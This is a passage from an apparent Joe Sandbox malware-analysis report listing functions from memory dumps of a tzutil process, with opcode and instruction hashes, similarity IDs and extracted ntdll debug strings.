                                                              • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction Fuzzy Hash: 60D05E767503057BFA40E6F49C83F5632CC8B14751F060064BA0CEA2C2D9A1F2508965
                                                              Function 039F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f377a40cbeae339e562399862f161ee352951e26a926bdb5a9543aff838cc961
                                                              • Instruction ID: 7229305b9462215d1718c7c665d5f7b4348019c775d4b4fe70680068643fb080
                                                              • Opcode Fuzzy Hash: f377a40cbeae339e562399862f161ee352951e26a926bdb5a9543aff838cc961
                                                              • Instruction Fuzzy Hash: 4BB09B719019C5C9DB11E76056087177908A7D0741F1AC4A2D3430685E473DC1D1E275

                                                              Non-executed Functions

                                                              Function 03CD04D0 Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289956647.0000000003CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3cd0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction ID: 43f68411ecb7f05ecc7ba1981ce609b900774ad6c0e9541d1db5a3919429839f
                                                              • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction Fuzzy Hash: F9410374608F1D4FD328FF6C90812B6B3E1FB48300F54052DEA8ACB252EA70E8468689
                                                              Function 03CDE0C9 Relevance: 56.5, Strings: 45, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289956647.0000000003CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3cd0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction ID: 48bda0f78f5d2101d9e8f47a9eb71f261fadcef101c96b5ddfd6220457a0a374
                                                              • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction Fuzzy Hash: 96A160F04082948AC7158F58A0552AFFFB1EBC6305F15816DE7E6BB243C3BE8909CB85
                                                              Function 039F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: a80408c8a9b8e95a756215f48d40d99f01c1e84c010e0a381966b7b007c556f2
                                                              • Instruction ID: 71ecb41b13c8b5da815e10ec5cb74175f163a9f12aace3df3dd79f7130d39ccf
                                                              • Opcode Fuzzy Hash: a80408c8a9b8e95a756215f48d40d99f01c1e84c010e0a381966b7b007c556f2
                                                              • Instruction Fuzzy Hash: BE51F9B9A00256BFCB10DF9C8980A7FFBBCBB48241754866AE5A5D7641D734DE408BE0
                                                              Function 03A62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 7a88a4ef10863c26aa498ea9c82b6682dae6868ae8d31d9a96983f31837f3027
                                                              • Instruction ID: a06e3a01c36950b8ba4acad62e6747c0c71d782d85864d244378fec7bb3d9e1b
                                                              • Opcode Fuzzy Hash: 7a88a4ef10863c26aa498ea9c82b6682dae6868ae8d31d9a96983f31837f3027
                                                              • Instruction Fuzzy Hash: FB519775A00645AFDB30DF9CC990A7EBBFDEB54200B44886FE4D6D7681D778EA408760
                                                              Function 039E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A24725
                                                              • Execute=1, xrefs: 03A24713
                                                              • ExecuteOptions, xrefs: 03A246A0
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A24655
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A24742
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A24787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A246FC
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 437dc4cbb756d53da5f2d418dc4a1717da9a3a40f4f93bda1c68492c36dd95bc
                                                              • Instruction ID: 614fb1409dfd9a3b0484f4785013499fef33cce893cc685636d006c10b8861fe
                                                              • Opcode Fuzzy Hash: 437dc4cbb756d53da5f2d418dc4a1717da9a3a40f4f93bda1c68492c36dd95bc
                                                              • Instruction Fuzzy Hash: D6512735A00319BEEF12EBE9DC85FAE77ACEF48704F04049AE505AB191E7719A418F52
                                                              Function 03A86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: be2916a679d8371b4ecd12e24217a072d4994cefa8499a42718f53ca6ab9bc21
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: 9D022675508341AFD309EF18C994A6BBBF5EFC8704F148A2EFA855B264DB31E905CB42
                                                              Function 039FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 29bee05903f0b9c489afa29d1e83301e8890ea744e53d11dfb056b2c54d63905
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: FB81F230E052499EDF24DF6CC8907FEBBBAAF853A0F1C455ADA61A7790C7348840CB50
                                                              Function 03A620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 96a2369b8ff59a22861c1eb2bd1e45e38e6695e08b30ead4bae1f0db083dd3f4
                                                              • Instruction ID: 64569121839c7c13f59cb41d4602275329642b33e7f86acc27ec9bd2011f37de
                                                              • Opcode Fuzzy Hash: 96a2369b8ff59a22861c1eb2bd1e45e38e6695e08b30ead4bae1f0db083dd3f4
                                                              • Instruction Fuzzy Hash: E0213E7AE04219AFDB10DF69D840AEEBBF8EF54654F48052AE915E7240E730DA018BA1
                                                              Function 03CD3CBE Relevance: 8.8, Strings: 7, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289956647.0000000003CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3cd0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                              • API String ID: 0-1416458366
                                                              • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction ID: 93f515bb7a9656b19501d33e5aea36d61d43acc06da155ccdca8d077c636fbc5
                                                              • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction Fuzzy Hash: CE31E2B091038CEBCB05CF94D5846DEBBB1FF04389F858559E81A6F250C771865ACB8A
                                                              Function 039DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A202BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A202E7
                                                              • RTL: Re-Waiting, xrefs: 03A2031E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 9fc6eeedfe7136a172def5135d0e2eff5072a13a588cf694ce289b410c1d3e81
                                                              • Instruction ID: c07ac4809b6b4a1e70d4ebd1cd3ec57347f97637f6f9c7d42350c7d51c5abbbf
                                                              • Opcode Fuzzy Hash: 9fc6eeedfe7136a172def5135d0e2eff5072a13a588cf694ce289b410c1d3e81
                                                              • Instruction Fuzzy Hash: 21E1CE356087419FD724CF28C886B6ABBE4BF84314F188A5EF5A78B2E0D774D845CB52
                                                              Function 039EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 03A27B8E
                                                              • RTL: Re-Waiting, xrefs: 03A27BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03A27B7F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 5375d716f4fa3cf33ad4347460f2c835d9520f7f2b9f8fcf87369b626edbb525
                                                              • Instruction ID: c74d6ca493b7d0090b902cad498a6eb2e05fb9ec327678afb9d93abc401d085b
                                                              • Opcode Fuzzy Hash: 5375d716f4fa3cf33ad4347460f2c835d9520f7f2b9f8fcf87369b626edbb525
                                                              • Instruction Fuzzy Hash: 134103357087029FDB25DF68C840B2AB7E9EF89710F040E1EF95ADB281DB31E9058B91
                                                              Function 039EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A2728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 03A272A3
                                                              • RTL: Re-Waiting, xrefs: 03A272C1
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03A27294
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: dac56e871387d749e5562efaa6321cd89e586bd9a0e13a8820dff58993d26a86
                                                              • Instruction ID: 4f2bd707d625b753505fb7360e6b5985b945bc6efdf6009682ddbf1068175f8b
                                                              • Opcode Fuzzy Hash: dac56e871387d749e5562efaa6321cd89e586bd9a0e13a8820dff58993d26a86
                                                              • Instruction Fuzzy Hash: 8F410F36704312AFD725CF28CC41B6ABBA9FB85710F140A1AF955EB281DB31E91287D0
                                                              Function 03A62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: b9de2f8928dc9fc26efd3b546d015652323094a870755454ee9af6aa860dd6eb
                                                              • Instruction ID: 3340ed3e1d912f67a3f655290ccddcf32b2b3a6167cb10efecc136686b980f3d
                                                              • Opcode Fuzzy Hash: b9de2f8928dc9fc26efd3b546d015652323094a870755454ee9af6aa860dd6eb
                                                              • Instruction Fuzzy Hash: E8317876A006199FDB20DF29DC40BEEB7F8EF84650F44455BE849E7240EB30AA458FA0
                                                              Function 039F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 3bd80cc09369b84e11ab9f2d4b46a823bec1d61cdd84bbcee08d76b15e16caeb
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 6B91B471E0021A9FDF24DEA9C880AFEB7A9EF443E4F5C461AEA65E72D0D73099418710
                                                              Function 039B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 6abeea13fef1617b30e3bb54aeebcf48788a6cc8e84972cabd82d81fb513a9b8
                                                              • Instruction ID: bff6f11a663da687e051f33a9475678c441a4013675a615eab858978a85875f8
                                                              • Opcode Fuzzy Hash: 6abeea13fef1617b30e3bb54aeebcf48788a6cc8e84972cabd82d81fb513a9b8
                                                              • Instruction Fuzzy Hash: 5B814C75D102699BDB31DB54CD44BEEB7B8AF48750F0445EAEA19B7280E7309E80CFA0